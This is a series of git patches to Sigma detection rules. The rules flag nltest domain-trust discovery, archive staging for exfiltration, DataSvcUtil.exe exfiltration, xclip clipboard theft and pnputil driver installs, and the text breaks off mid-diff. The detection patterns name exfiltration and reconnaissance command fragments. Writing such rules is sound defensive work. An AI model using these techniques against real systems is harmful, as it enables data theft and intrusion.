a/rules/windows/file_delete/sysmon_delete_prefetch.yml b/rules/windows/file_delete/sysmon_delete_prefetch.yml index be238a8f..45197194 100755 --- a/rules/windows/file_delete/sysmon_delete_prefetch.yml +++ b/rules/windows/file_delete/sysmon_delete_prefetch.yml @@ -1,4 +1,4 @@ -title: Prefetch file deletion +title: Prefetch File Deletion id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 status: experimental description: Detects the deletion of a prefetch file (AntiForensic) From 2ae2c35a7fd72718339c01028037d134aadd79d9 Mon Sep 17 00:00:00 2001 From: "neonprimetime security (Justin C Miller)" Date: Wed, 29 Sep 2021 07:47:12 -0500 Subject: [PATCH 1137/1367] mispelled 'mshta.exe' in selection_base it said 'mhsta.exe' and it should say 'mshta.exe' --- rules/windows/process_creation/win_susp_mshta_pattern.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_mshta_pattern.yml b/rules/windows/process_creation/win_susp_mshta_pattern.yml index d9e7e010..8291ef09 100644 --- a/rules/windows/process_creation/win_susp_mshta_pattern.yml +++ b/rules/windows/process_creation/win_susp_mshta_pattern.yml @@ -16,7 +16,7 @@ logsource: detection: # Binary Selector selection_base: - Image|endswith: '\mhsta.exe' + Image|endswith: '\mshta.exe' # Suspicious parents selection1: ParentImage|endswith: From 056067086c1428e3ab6962ef1611270dbc72fb73 Mon Sep 17 00:00:00 2001 From: webboy2015 Date: Wed, 29 Sep 2021 14:33:36 -0700 Subject: [PATCH 1138/1367] Create win_lolbas_execution_of_nltest.exe.yaml The attacker might use LOLBAS nltest.exe for the discovery of domain controllers, domain trusts, parent domain, and the current user permissions. This event can be detected in the Windows Security Log by looking for event id 4689 indicating that nltest.exe was executed and has exited with the execution result of "0x0". --- .../win_lolbas_execution_of_nltest.exe | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/process_creation/win_lolbas_execution_of_nltest.exe diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe new file mode 100644 index 00000000..11563746 --- /dev/null +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe @@ -0,0 +1,28 @@ +title: windows lolbas execution of nltest.exe +id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 # https://www.uuidgenerator.net/version4 +status: experimental +author: Arun Chauhan +date: 2021/08/24 +description: The attacker might use LOLBAS nltest.exe for discovery of domain controllers, domain trusts, parent domain and the current user permissions. +references: + - https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm + - https://attack.mitre.org/software/S0359/ +tags: + - attack.discovery + - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts + - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc + - attack.1016 # enumerate the parent domain of a local machine using /parentdomain +logsource: + product: windows + service: security +detection: + selection: + EventID: 4689 + Image|contains: "nltest.exe" + ExitStatus: "0x0" + condition: selection +fields: + - "SubjectUserName" +falsepositives: + - "Red team activity" +level: high From 29d66a965cd91e60142f720bb83e51a48610f457 Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 30 Sep 2021 10:03:11 +0200 Subject: [PATCH 1139/1367] add 4104 --- .../powershell/powershell_susp_zip_compress.yml | 15 +++++++++++---- 1 file changed, 11 insertions(+), 4 deletions(-) diff --git a/rules/windows/powershell/powershell_susp_zip_compress.yml b/rules/windows/powershell/powershell_susp_zip_compress.yml index be6c466f..98f882e4 100644 --- a/rules/windows/powershell/powershell_susp_zip_compress.yml +++ b/rules/windows/powershell/powershell_susp_zip_compress.yml @@ -3,7 +3,7 @@ id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 status: experimental author: frack113 date: 2021/07/20 -modified: 2021/09/07 +modified: 2021/09/30 description: Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration references: - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md @@ -13,16 +13,23 @@ tags: logsource: product: windows service: powershell - definition: Module Logging must be enabled + definition: 4103 Module Logging must be enabled , 4104 Script Block Logging must be enable detection: - selection: + selection_4103: EventID: 4103 ContextInfo|contains|all: - 'Compress-Archive ' - ' -Path ' - ' -DestinationPath ' - '$env:TEMP\' - condition: selection + selection_4104: + EventID: 4104 + ScriptBlockText|contains|all: + - 'Compress-Archive ' + - ' -Path ' + - ' -DestinationPath ' + - '$env:TEMP\' + condition: selection_4103 or selection_4104 falsepositives: - Unknown level: medium From 67818f125aad1ca9fdbb4c748d537e7c0c58a43f Mon Sep 17 00:00:00 2001 From: hazedav Date: Thu, 30 Sep 2021 09:27:18 -0500 Subject: [PATCH 1140/1367] fix(backend): add remediation for lacework policy --- tools/sigma/backends/lacework.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/lacework.py b/tools/sigma/backends/lacework.py index 41433534..29cc3ea7 100644 --- a/tools/sigma/backends/lacework.py +++ b/tools/sigma/backends/lacework.py @@ -554,7 +554,7 @@ class LaceworkPolicy: self.description = safe_get(rule, 'description', str) # 14. Get Remediation - self.remediation = "" + self.remediation = 'Remediation steps are not represented in Sigma rule specification' def __iter__(self): for key, attr in { From 82ba266a53e4df0498d8a6cef5346be2ef729419 Mon Sep 17 00:00:00 2001 From: Andreas Hunkeler Date: Thu, 30 Sep 2021 16:38:39 +0200 Subject: [PATCH 1141/1367] Add fp note to powershell winapi rule --- rules/windows/powershell/powershell_accessing_win_api.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_accessing_win_api.yml b/rules/windows/powershell/powershell_accessing_win_api.yml index f7ed287e..4599517b 100644 --- a/rules/windows/powershell/powershell_accessing_win_api.yml +++ b/rules/windows/powershell/powershell_accessing_win_api.yml @@ -68,5 +68,5 @@ detection: - 'secur32' condition: selection falsepositives: - - Unknown + - Carbon PowerShell Module (https://github.com/webmd-health-services/Carbon) level: high From 76224b0fb2d23a24212bb162318cf04833bb76cd Mon Sep 17 00:00:00 2001 From: zaicurity <59199225+zaicurity@users.noreply.github.com> Date: Thu, 30 Sep 2021 18:12:19 +0200 Subject: [PATCH 1142/1367] Added alternative nltest command parameter Same as recent change to "Recon Activity with NLTEST" (see commit a2418e4d2cadeefa3b6a7bb639a92ff0872b89ca) Added the command parameter '/trusted_domains' for nltest which can be used as an alternative to '/domain_trusts' to bypass detection. Tested on Windows 10.0.19042 Reference: https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ --- rules/windows/process_creation/win_trust_discovery.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_trust_discovery.yml b/rules/windows/process_creation/win_trust_discovery.yml index 9ff5c557..e68aa17f 100644 --- a/rules/windows/process_creation/win_trust_discovery.yml +++ b/rules/windows/process_creation/win_trust_discovery.yml @@ -25,6 +25,7 @@ detection: CommandLine|contains: - 'domain_trusts' - 'all_trusts' + - '/trusted_domains' - '/dclist' selection_dsquery_v1: Image|endswith: '\dsquery.exe' From e90094576149b8c04447ecaebed43f3e991a63d9 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 30 Sep 2021 19:26:14 +0200 Subject: [PATCH 1143/1367] Update win_trust_discovery.yml --- rules/windows/process_creation/win_trust_discovery.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_trust_discovery.yml b/rules/windows/process_creation/win_trust_discovery.yml index e68aa17f..7d3009e7 100644 --- a/rules/windows/process_creation/win_trust_discovery.yml +++ b/rules/windows/process_creation/win_trust_discovery.yml @@ -13,6 +13,7 @@ references: - https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/ - https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ + - https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ tags: - attack.discovery - attack.t1482 From b0b95ce32b0808e3a356b6e5fc5666ed841c046b Mon Sep 17 00:00:00 2001 From: Tareq Alkhatib Date: Thu, 30 Sep 2021 16:34:14 -0400 Subject: [PATCH 1144/1367] Corrected Technique --- .../windows/process_creation/process_mailboxexport_share.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index d0d62110..4d08c42c 100644 --- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -25,5 +25,5 @@ fields: - CommandLine - ParentCommandLine tags: - - attack.collection - - attack.t1114 \ No newline at end of file + - attack.persistence + - attack.t1505.003 \ No newline at end of file From 00513ff2c515ae0bed40a7ac4306c6a169e841df Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 18:47:15 -0500 Subject: [PATCH 1145/1367] Create macos_suspicious_macos_firmware_activity.yml --- ...cos_suspicious_macos_firmware_activity.yml | 27 +++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 rules/linux/macos_suspicious_macos_firmware_activity.yml diff --git a/rules/linux/macos_suspicious_macos_firmware_activity.yml b/rules/linux/macos_suspicious_macos_firmware_activity.yml new file mode 100644 index 00000000..cc89eebf --- /dev/null +++ b/rules/linux/macos_suspicious_macos_firmware_activity.yml @@ -0,0 +1,27 @@ +title: Suspicious MacOS Firmware Activity +id: 7ed2c9f7-c59d-4c82-a7e2-f859aa676099 +status: experimental +description: Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers. +author: Austin Songer @austinsonger +date: 2021/09/30 +references: + - https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml + - https://www.manpagez.com/man/8/firmwarepasswd/ + - https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web +logsource: + category: process_creation + product: macos +detection: + selection1: + Image: '/usr/sbin/firmwarepasswd' + CommandLine|contains: + - 'setpasswd' + - 'full' + - 'delete' + - 'check' + condition: selection1 +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.impact From 3d7f96ddd7c3809df21b89d62b907f34a43e9a77 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:14:34 -0500 Subject: [PATCH 1146/1367] Create process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...suspicious_driver_installed_by_pnputil.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml new file mode 100644 index 00000000..e7a5f636 --- /dev/null +++ b/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -0,0 +1,35 @@ +title: Suspicious Driver Install by pnputil.exe +status: experimental +id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 +author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger +date: 2021/09/30 +description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin +references: + - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax + - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html +tags: + - attack.persistence + - attack.t1547 + - attack.t1547.006 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - '-i' + - '-a' + - '-e' + - '.inf' + Image|endswith: + - '\pnputil.exe' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage + - Penetration test +level: medium From 18d65387b5f888d372d39d14487c2427eedb4d59 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:15:03 -0500 Subject: [PATCH 1147/1367] Create process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...suspicious_driver_installed_by_pnputil.yml | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml new file mode 100644 index 00000000..e7a5f636 --- /dev/null +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -0,0 +1,35 @@ +title: Suspicious Driver Install by pnputil.exe +status: experimental +id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 +author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger +date: 2021/09/30 +description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin +references: + - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax + - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html +tags: + - attack.persistence + - attack.t1547 + - attack.t1547.006 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains: + - '-i' + - '-a' + - '-e' + - '.inf' + Image|endswith: + - '\pnputil.exe' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage + - Penetration test +level: medium From 7f0ad710fdf41e357d4ed3cc47c2fca5d7b454cb Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:15:40 -0500 Subject: [PATCH 1148/1367] Delete process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...suspicious_driver_installed_by_pnputil.yml | 35 ------------------- 1 file changed, 35 deletions(-) delete mode 100644 rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml diff --git a/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml deleted file mode 100644 index e7a5f636..00000000 --- a/rules/windows/process_creationprocess_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ /dev/null @@ -1,35 +0,0 @@ -title: Suspicious Driver Install by pnputil.exe -status: experimental -id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 -author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger -date: 2021/09/30 -description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin -references: - - https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/pnputil-command-syntax - - https://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html -tags: - - attack.persistence - - attack.t1547 - - attack.t1547.006 -logsource: - category: process_creation - product: windows -detection: - selection: - CommandLine|contains: - - '-i' - - '-a' - - '-e' - - '.inf' - Image|endswith: - - '\pnputil.exe' - condition: selection -fields: - - ComputerName - - User - - CommandLine - - ParentCommandLine -falsepositives: - - System administrator Usage - - Penetration test -level: medium From b14d9e38266044cdb1c8d00c202bd7ff79c07086 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:16:02 -0500 Subject: [PATCH 1149/1367] Update process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...s_creation_lolbins_suspicious_driver_installed_by_pnputil.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index e7a5f636..b7c209c0 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -19,7 +19,6 @@ detection: CommandLine|contains: - '-i' - '-a' - - '-e' - '.inf' Image|endswith: - '\pnputil.exe' From e274df1b13a35750af11950170ad6de16ba10636 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:18:38 -0500 Subject: [PATCH 1150/1367] Update process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ...ation_lolbins_suspicious_driver_installed_by_pnputil.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index b7c209c0..a21b20c6 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -29,6 +29,8 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - System administrator Usage - - Penetration test + - Pnputil.exe being used may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Pnputil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Penetration Testing level: medium From d55ffe721e7b8369f416d6a848f6e1480044c683 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:19:18 -0500 Subject: [PATCH 1151/1367] Update process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml --- ..._creation_lolbins_suspicious_driver_installed_by_pnputil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml index a21b20c6..1072fdb3 100644 --- a/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml +++ b/rules/windows/process_creation/process_creation_lolbins_suspicious_driver_installed_by_pnputil.yml @@ -1,7 +1,7 @@ title: Suspicious Driver Install by pnputil.exe status: experimental id: a2ea3ae7-d3d0-40a0-a55c-25a45c87cac1 -author: @LuxNoBulIshit, @aloneliassaf, Austin Songer @austinsonger +author: Hai Vaknin @LuxNoBulIshit, Avihay eldad @aloneliassaf, Austin Songer @austinsonger date: 2021/09/30 description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin references: From 04acba9c77761b61b60093ee032f1bc9431671a8 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Thu, 30 Sep 2021 19:58:21 -0500 Subject: [PATCH 1152/1367] Create process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml --- ...data_exfiltration_by_using_datasvcutil.yml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml diff --git a/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml new file mode 100644 index 00000000..71febbac --- /dev/null +++ b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml @@ -0,0 +1,36 @@ +title: LOLBAS Data Exfiltration by DataSvcUtil.exe +id: e290b10b-1023-4452-a4a9-eb31a9013b3a +status: experimental +author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger +date: 2021/09/30 +description: Detects when a user performs data exfiltration by using DataSvcUtil.exe +references: + - https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6 + - https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe + - https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services + - https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services +tags: + - attack.exfiltration + - attack.t1567 +logsource: + category: process_creation + product: windows +detection: + selection: + CommandLine|contains|all: + - '/in:*' + - '/out:*' + Image|endswith: + - '\DataSvcUtil.exe' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - DataSvcUtil.exe being used may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Penetration Testing +level: medium From 0d22601112a0680330c5ad61928440d683128a62 Mon Sep 17 00:00:00 2001 From: Tareq Alkhatib Date: Fri, 1 Oct 2021 08:40:59 -0400 Subject: [PATCH 1153/1367] Added Compromise Infrastructure: Web Services technique --- .../windows/process_creation/process_mailboxexport_share.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/process_mailboxexport_share.yml b/rules/windows/process_creation/process_mailboxexport_share.yml index 4d08c42c..afcf7471 100644 --- a/rules/windows/process_creation/process_mailboxexport_share.yml +++ b/rules/windows/process_creation/process_mailboxexport_share.yml @@ -26,4 +26,6 @@ fields: - ParentCommandLine tags: - attack.persistence - - attack.t1505.003 \ No newline at end of file + - attack.t1505.003 + - attack.resource_development + - attack.t1584.006 \ No newline at end of file From e67770d7ea961514c6eef13c1f887049b9e1de5b Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Fri, 1 Oct 2021 18:43:03 +0200 Subject: [PATCH 1154/1367] New Rule - Linux - Auditd - Clipboard Collection of Image Data with Xclip Tool --- .../lnx_auditd_clipboard_image_collection.yml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml diff --git a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml new file mode 100644 index 00000000..d9ec837b --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -0,0 +1,32 @@ +title: Clipboard Collection of Image Data with Xclip Tool +id: f200dc3f-b219-425d-a17e-c38467364816 +description: Detects attempts to collect image data stored in the clipboard from users with the usage of xclip tool. Xclip has to be installed. Highly recommended using rule on servers, due to high usage of clipboard utilities on user workstations. +author: 'Pawel Mazur' +status: experimental +date: 2021/10/01 +references: + - https://attack.mitre.org/techniques/T1115/ + - https://linux.die.net/man/1/xclip +logsources: + product: linux + service: auditd +detection: + xclip: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-t' + a4: 'image/png' + a5: '-o' + condition: xclip +tags: + - attack.collection + - attack.t1115 +falsepositives: + - Legitimate usage of xclip tools +level: low \ No newline at end of file From d40b42fc2ce09799fc0dd739b8a0ad2728a25dcf Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 1 Oct 2021 18:54:12 +0200 Subject: [PATCH 1155/1367] Update lnx_auditd_clipboard_image_collection.yml fixing a typo --- rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml index d9ec837b..67906351 100644 --- a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml +++ b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -7,7 +7,7 @@ date: 2021/10/01 references: - https://attack.mitre.org/techniques/T1115/ - https://linux.die.net/man/1/xclip -logsources: +logsource: product: linux service: auditd detection: @@ -29,4 +29,4 @@ tags: - attack.t1115 falsepositives: - Legitimate usage of xclip tools -level: low \ No newline at end of file +level: low From 87df79302d58f605104841c477254f534a4de28b Mon Sep 17 00:00:00 2001 From: webboy2015 Date: Fri, 1 Oct 2021 12:55:37 -0700 Subject: [PATCH 1156/1367] Update win_lolbas_execution_of_nltest.exe Changed condition as follows: detection: selection: EventID: 4689 ProcessName|endswith: nltest.exe Status: "0x0" condition: selection Included field - SubjectDomainName --- .../process_creation/win_lolbas_execution_of_nltest.exe | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe index 11563746..e36bff3e 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe @@ -18,11 +18,12 @@ logsource: detection: selection: EventID: 4689 - Image|contains: "nltest.exe" - ExitStatus: "0x0" + ProcessName|endswith: nltest.exe + Status: "0x0" condition: selection fields: - "SubjectUserName" + - "SubjectDomainName" falsepositives: - "Red team activity" level: high From e6b32b90af35f79be188920a175981b083aaee08 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 2 Oct 2021 07:25:11 +0200 Subject: [PATCH 1157/1367] Update win_lolbas_execution_of_nltest.exe --- .../process_creation/win_lolbas_execution_of_nltest.exe | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe index e36bff3e..24a70d34 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe @@ -1,5 +1,5 @@ -title: windows lolbas execution of nltest.exe -id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 # https://www.uuidgenerator.net/version4 +title: Correct Execution of Nltest.exe +id: eeb66bbb-3dde-4582-815a-584aee9fe6d1 status: experimental author: Arun Chauhan date: 2021/08/24 @@ -25,5 +25,6 @@ fields: - "SubjectUserName" - "SubjectDomainName" falsepositives: - - "Red team activity" + - Red team activity + - rare legitimate use by an administrator level: high From f652745924a6fb75b64779885f13f2ec940a3c13 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 2 Oct 2021 07:53:19 +0200 Subject: [PATCH 1158/1367] Update and rename win_lolbas_execution_of_nltest.exe to win_lolbas_execution_of_nltest.yml --- ...ecution_of_nltest.exe => win_lolbas_execution_of_nltest.yml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename rules/windows/process_creation/{win_lolbas_execution_of_nltest.exe => win_lolbas_execution_of_nltest.yml} (93%) diff --git a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml similarity index 93% rename from rules/windows/process_creation/win_lolbas_execution_of_nltest.exe rename to rules/windows/process_creation/win_lolbas_execution_of_nltest.yml index 24a70d34..f95ad5b8 100644 --- a/rules/windows/process_creation/win_lolbas_execution_of_nltest.exe +++ b/rules/windows/process_creation/win_lolbas_execution_of_nltest.yml @@ -11,7 +11,7 @@ tags: - attack.discovery - attack.t1482 # enumerate trusted domains by using commands such as nltest /domain_trusts - attack.t1018 # enumerate remote domain controllers using options such as /dclist and /dsgetdc - - attack.1016 # enumerate the parent domain of a local machine using /parentdomain + - attack.t1016 # enumerate the parent domain of a local machine using /parentdomain logsource: product: windows service: security From c2a26923c66cda9c3995e2e87ace259e11a31da7 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Sat, 2 Oct 2021 09:59:37 +0200 Subject: [PATCH 1159/1367] Update lnx_auditd_clipboard_image_collection.yml --- rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml index 67906351..181bf652 100644 --- a/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml +++ b/rules/linux/auditd/lnx_auditd_clipboard_image_collection.yml @@ -21,7 +21,7 @@ detection: - clipboard - clip a3: '-t' - a4: 'image/png' + a4|startswith: 'image/' a5: '-o' condition: xclip tags: From 81d1bb0e2b73465717e74a5685da594043f1a0e0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 2 Oct 2021 13:32:20 -0500 Subject: [PATCH 1160/1367] Update process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml --- ...creation_lolbas_data_exfiltration_by_using_datasvcutil.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml index 71febbac..ea11ff85 100644 --- a/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml +++ b/rules/windows/process_creation/process_creation_lolbas_data_exfiltration_by_using_datasvcutil.yml @@ -18,8 +18,8 @@ logsource: detection: selection: CommandLine|contains|all: - - '/in:*' - - '/out:*' + - '/in:' + - '/out:' Image|endswith: - '\DataSvcUtil.exe' condition: selection From 62025971c79d365e307487fb57108e084c0dd0fb Mon Sep 17 00:00:00 2001 From: albchen Date: Sun, 3 Oct 2021 17:37:05 -0700 Subject: [PATCH 1161/1367] Add generateAggregation Adds aggregation function for rules such as win_multiple_suspicious_cli.yml or win_dnscat2_powershell_implementation.yml. Modeled after splunk.py backend, converted to use MDE's count() and dcount() instead of Splunk's count() and dc(). Requires a valid config for converting aggfields and groupfields. --- tools/sigma/backends/mdatp.py | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/tools/sigma/backends/mdatp.py b/tools/sigma/backends/mdatp.py index 